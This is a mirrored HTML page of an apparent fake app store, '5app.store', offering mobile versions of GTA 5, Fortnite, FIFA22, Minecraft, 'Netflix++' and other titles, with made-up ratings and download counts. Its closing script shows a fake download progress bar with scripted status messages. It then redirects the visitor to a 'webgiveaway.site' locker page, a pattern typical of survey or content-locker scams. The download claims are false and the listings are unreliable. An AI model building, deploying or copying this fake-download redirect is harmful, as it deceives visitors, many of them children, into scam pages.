<html>

<!-- Mirrored from 3apps.pro/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 01 Apr 2020 15:36:39 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from gta5-mobile.online/download/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 14 Dec 2021 11:27:40 GMT -->

<!-- Mirrored from games4mobile.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Mar 2022 13:19:00 GMT -->

<!-- Mirrored from 5app.store/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 20 Apr 2022 02:07:43 GMT -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <link rel="stylesheet" href="path/to/font-awesome/css/font-awesome.min.html">

   
<meta name="google-site-verification" content="BO0wVSEsVchjkyEyLJ3Ji3sk-SbQ9M8EKQtgCWXeaL0" />
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible"f content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="pushsdk" content="0b3aea1c0f84c935acb87c8cc9a720bb">
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
    <link rel="stylesheet" href="05apps.us/maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
    <link href="05apps.us/netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap-glyphicons.css" rel="stylesheet">

    <title>5app.store</title>
    <!-- Styles -->
    <link href="05apps.us/fonts.googleapis.com/csse092e092e092.html?family=Open+Sans:400,300,600" rel="stylesheet" type="text/css">
    <link href="build/panel/app.css" rel="stylesheet">
    <link href="css/app.css" rel="stylesheet">
    <link href="css/framework7.css" rel="stylesheet">

<style>
.install-btn-text {
    font-size: 12px;
    color: #000000;
}
    p.Latest {
    display: contents;
}
 i.fab.fa-android {
    display: contents;
    font-family: fontawesome;
    color: #02bb22;
    font-size: 12px;
    padding-right: 6px;
        font-style: normal;
}

i.fab.fa-apple {
    display: contents;
    font-family: fontawesome;
    color: #057dd3;
    font-size: 12px;
    padding-right: 3px;
        font-style: normal;
}


.ios-icon {
	border-radius: 24%;
	box-shadow: rgb(0 0 0 / 20%) 0px 2px 10px;
	width: 78px;
	height: 78px;
	float: left;
	border-radius: 10px;
	border: 4px solid #fff;
}



.app-box-1 {
color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-2 {
color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-3 {
	color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-4 {
color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-5 {
color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-6 {
	color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-7 {
	color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}
.app-box-8 {
color: #131413;
    background: #000000eb;
    padding: 8px 4px 5px 3px;
    border-radius: 14px;
    border: 2px solid #0091ff;
    position: inherit;
    margin: 1px 1px 7px 1px;
}

.btn-success {
    padding: 3px 10px;
    border-radius: 10px !important;
    background: #f1f1f1;
    color: #0091ff;
    font-size: 14px;
    font-weight: 600;
    border: 1px solid;
}

   .stars1 {
   width: 100%;
    color: #8da5ff;
    position: absolute;
    padding-left: 76px;
    margin: -13px 4px 11px 5px;
    font-size: 11px;
}
p.app-version {
    color: white;
    padding: 2px;
}
b1 {
    position: absolute;
    padding-left: 39px;
    margin: -11px 4px 11px 5px;
    font-weight: bold;
    font-size: 9px;
    color: #F3CB1E;
}
.app-name {
    font-weight: 700;
    font-size: 16px;
    padding-bottom: 12px;
}
i.fas.fa-download {
    display: initial;
    font-family: fontawesome;
    padding: 2px;
        font-style: normal;
}
i.fas.fa-user {
    display: initial;
    font-family: fontawesome;
    padding: 2px;
        font-style: normal;
}
.LINE-Dotted1 {
    border-top: 1px dotted;
    width: 39.2%;
    margin-left: 83px;
}
.Latest {
   position: absolute;
    margin: -17px 7px 3px;
    font-size: 12px;
    color: #ffffff;
    font-weight: bold;
}
.version {
   position: absolute;
    margin: -16px 49px 3px;
    font-size: 12px;
    color: #0c0c0c;
    font-weight: bold;
    color: #F3CB1E;
}
.white-bg {
    background-image: linear-gradient(
200deg, #78b4ff 0%, #1379d1 50%, #a2fff6 100%);
    background-size: 100% 283px;
    background-repeat: no-repeat;
}
.review {
    position: absolute;
    left: 226.5px;
    display: inherit;
    background: #2196f3;
    color: #fffdfd;
    border-radius: 0px 0px 8px 8px;
    padding: 0px 6px 0px 3px;
    border-left: 2px solid #f3cb07;
    border-bottom: 2px solid #F3CB1E;
    bottom: 88px;
}
i.fas.fa-star{
    display: initial;
    font-family: fontawesome;
    padding: 2px;
    color: #e7e005;
        font-style: normal;
}
.app-name1 {
    position: relative;
    padding: 0px 0px 13px 3px;
    right: 9px;
    FONT-WEIGHT: 700;
    font-family: inherit;
    font-size: 14px;
    color: #fff;
}
.app-box {
    background-color: #322a2a;
    border: unset;
    padding: 10px 0;
}
div#myPopup {
    background: #05000a;
    border: 2px solid #2196f3;
    border-radius: 13px;
}
}
#bar1 {
    background: #F3CB1E;
}
.md .dialog-title {
    font-size: 20px;
    color: #ffffff;
    line-height: 1.3;
}
</style>
    
    <script src="05apps.us/ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-BG03XMDY1Z"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-BG03XMDY1Z');
</script>
</head>
<body>
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TGHGVX2"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
<main class="page-content framework7-root">
    <div class="page-inner white-bg">
        <div id="main-wrapper">
            <div class="row">
                <div class="col-md-6 col-xs-12 col-sm-12 center">
                    <div class="main-page-title">
                        <img src="img/logo.png" class="app-navbar-head-logo center breathing">
                    </div>
                    
                    <br>
                    <div class="app-box appscloud-block">

                       
                        
                        <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/0Ks3qm0.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.7</div>
                                        <div class="app-name1">GTA 5 MOBILE</div>
                                        <div class="stars1"><i class="fas fa-user"></i>612,411</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/0Ks3qm0.jpg', 'GTA 5 ','ba77730')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/0Ks3qm0.jpg', 'GTA 5 ','ba77730')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">3.2.1</div>
                                </div>
                            </div>
                            
                            <div class="col-md-12 app-list-md">
                                <div class="app-box-2">
                                    <img class="img-responsive ios-icon app-icon" src="img/Fortnite345.png">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.8</div>
                                        <div class="app-name1">Fortnite Mobile</div>
                                        <div class="stars1"><i class="fas fa-user"></i>920,021</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a  onclick="install('img/Fortnite345.png', 'Fortnite ','2b31da2')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a onclick="install('img/Fortnite345.png', 'Fortnite ','2b31da2')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">2.3.1</div>
                                </div>
                            </div>
                              <div class="col-md-12 app-list-md">
                                <div class="app-box-7">
                                    <img class="img-responsive ios-icon app-icon" src="img/aencyzF.jpg">
                                    <div class="app-info">
                                        <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        
                                        <div class="app-name1">FIFA22</div>
                                        <div class="stars1"><i class="fas fa-user"></i>880,381</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a href="#" onclick="install('img/aencyzF.jpg', 'FIFA22 ','214e793')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS</b></span>
                                    </a>
                                    <a href="#" onclick="install('img/aencyzF.jpg', 'FIFA22 ','214e793')" class="btn btn-success btn-xs btn-install">
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    </a>
                                    <div class="clearfix"></div>
                                    <div class="Latest">Latest:</div> <div class="version">1.4.2</div>
                                </div>
                            </div>
                            
                            
                           
                        
                      
                      <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/Jxx4wkaQ.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.7</div>
                                        <div class="app-name1">Poppy Playtime</div>
                                        <div class="stars1"><i class="fas fa-user"></i>812,411</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/Jxx4wkaQ.jpg', 'Poppy Playtime ','e22fc1d')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/Jxx4wkaQ.jpg', 'Poppy Playtime ','e22fc1d')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">3.2.1</div>
                                </div>
                            </div>
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/Naruto78d7.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.8</div>
                                        <div class="app-name1">Naruto Mobile</div>
                                        <div class="stars1"><i class="fas fa-user"></i>790,161</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/Naruto78d7.jpg', 'Naruto ','f718c57')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/Naruto78d7.jpg', 'Naruto ','f718c57')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">3.2.1</div>
                                </div>
                            </div>
							
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/5M1ZsvA.png">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.5</div>
                                        <div class="app-name1">Spider Man</div>
                                        <div class="stars1"><i class="fas fa-user"></i>117,141</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/5M1ZsvA.png', 'Spider-Man ','58d65f5')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/5M1ZsvA.png', 'Spider-Man ','58d65f5')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">3.5.3</div>
                                </div>
                            </div>
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/222022.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        <div class="app-name1">BrawlStars++</div>
                                        <div class="stars1"><i class="fas fa-user"></i>732,739</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/222022.jpg', 'Brawlstars','f359b24')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/222022.jpg', 'Brawlstars','f359b24')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">9.2.1</div>
                                </div>
                            </div>
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/VL2022.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.3</div>
                                        <div class="app-name1">MINECRAFT MOBILE</div>
                                        <div class="stars1"><i class="fas fa-user"></i>632,036</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/VL2022.jpg', 'MINECRAFT','409ebc1')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/VL2022.jpg', 'MINECRAFT','409ebc1')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">4.1.1</div>
                                </div>
                            </div>
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/345662234.jpg">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.7</div>
                                        <div class="app-name1">God Of War Mobile</div>
                                        <div class="stars1"><i class="fas fa-user"></i>510,261</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/345662234.jpg', 'God Of War','454bcbe')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/345662234.jpg', 'God Of War','454bcbe')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">2.5.3</div>
                                </div>
                            </div>
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/5M1ZsvB.png">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.3</div>
                                        <div class="app-name1">WWE 2K22</div>
                                        <div class="stars1"><i class="fas fa-user"></i>120,311</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/5M1ZsvB.png', 'WWE 2K22 ','f2c2921')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/5M1ZsvB.png', 'WWE 2K22 ','f2c2921')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">1.1.2</div>
                                </div>
                            </div>
							
							
							 <div class="col-md-12 app-list-md">
                                <div class="app-box-1">
                                    <img class="img-responsive ios-icon app-icon" src="img/1234G567.png">
                                
                                    <div class="app-info">
                                          <div class="review"><i class="fas fa-star"></i>4.9</div>
                                        <div class="app-name1">Netflix++</div>
                                        <div class="stars1"><i class="fas fa-user"></i>250,185</div><b1><i class="fas fa-download"></i>Download</b1>
                                        <div class="LINE-Dotted1"></div>
                                        <p class="app-version" style="font-size: 10px">Choose your device</p>
                                    </div>
                                    <a onclick="install('img/1234G567.png', 'Netflix++ ','b88685e')" class="btn btn-success btn-xs btn-install">
                            
                                        <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-apple"></i><b> IOS </b></span>
                                        
                                    </a>
                                
                                    <a  onclick="install('img/1234G567.png', 'Netflix++ ','b88685e')" class="btn btn-success btn-xs btn-install">
                                   <span class="install-btn-text" onclick="start()" id="install-btn"><i class="fab fa-android"></i><b> ANDROID</b></span>
                                    
                                    <div class="clearfix"></div>
                                    </a>
                            <div class="Latest">Latest:</div> <div class="version">3.2.1</div>
                                </div>
                            </div>
                            
                                                  
                           
                            
                    </div>
                </div>
            </div><!-- Row -->
        </div><!-- Main Wrapper -->
    </div><!-- Page Inner -->
</main><!-- Page Content -->

<div class="popup modal-in" id="install" style="background: #fff; display: none;">
    <div class="fake-homescreen" style="">
        <a id="close" class="close-button"></a>
        <div class="iphone-display" aria-hidden="true">
            <div class="app-icon-area">
                <div class="app-icon-region">
                    <img id="app_icon" alt="app icon" src="#" class="app-modal-icon" style="width: 33px; height: 33px;">
                </div>
                <div class="fake-homescreen-app-name" style="font-size:7.5px!important">
                    <span id="app_name" class="installingAppName">Pokemon Go Spoofing</span>
                </div>
            </div>
        </div>
    </div>
    <div class="block" style="color:#000000">
        <center>
            <div>
                <div class="app-caption">
                    <h2 id="app-caption-title">title</h2>
                    <p>Follow the steps after downloading</p>
                </div>
                <hr>
                <div class="details">
                    <a class="" onclick="start()" id="install-btn"></a>
                    
                </div>
            </div>
        </center>
    </div>
</div>
<div role="dialog">

    <div class="md" id="myPopup1" style="display: none">
        <div class="dialog-backdrop backdrop-in"></div>
        <div class="dialog dialog-no-buttons dialog-progress modal-in" id="myPopup" style="display: none; margin-top: -100px;">

            <div class="dialog-inner">
                <div class="dialog-title"><br>Downloading...
</div><div id="dt" class="dialog-text">Sit tight</div>
                <div class="progressbar">
                    <span id="bar1" style="width: 0%; display: inline-block; height: 100%; transform: scale(-1, 1);"></span>
                </div>
            </div>

        </div>
    </div>
</div>
<script>var lockerIDs=[];</script><script src="js/ipscript.js" type="text/javascript"></script>
<script>
    function id(id){
        return document.getElementById(id);
    }

    function install(icon, name, locker_id)
    {
        id("app_icon").src = icon;
        id("app_name").innerHTML = name;
        id("app-caption-title").innerHTML = name;

        window.lcr = "https://webgiveaway.site/pages/" + (lockerIDs[name] ? lockerIDs[name] : locker_id);
        id("install").style.display = "block";
    }

    id('close').onclick = function(){
        id("install").style.display = "none";
    }

    // When the user clicks on div, open the popup
    function start() {
        var x = document.getElementById("myPopup1");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }
        var x = document.getElementById("myPopup");
        if (x.style.display === "none") {
            x.style.display = "block";
        } else {
            x.style.display = "none";
        }

        var i = 0;
        $("#bar1").animate(
                {width: "100%"},
                {
                    duration: 5000,
                    complete : function(){
                        location.href = window.lcr;
                    }
                });


        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Connecting to the servers')
            }

            setTimeout(changeText, 100);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Getting package url')
            }

            setTimeout(changeText, 100);

        });
        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Downloading')
            }

            setTimeout(changeText, 200);

        });

        $(document).ready(function() {

            function changeText(){
                $("#dt").text('Setting up final stage')
            }

            setTimeout(changeText, 100);

        });


    }
</script>
</body>

<!-- Mirrored from 3apps.pro/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 01 Apr 2020 15:36:45 GMT -->

<!-- Mirrored from gta5-mobile.online/download/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 14 Dec 2021 11:27:55 GMT -->

<!-- Mirrored from games4mobile.xyz/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Mar 2022 13:19:11 GMT -->

<!-- Mirrored from 5app.store/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 20 Apr 2022 02:07:48 GMT -->
</html>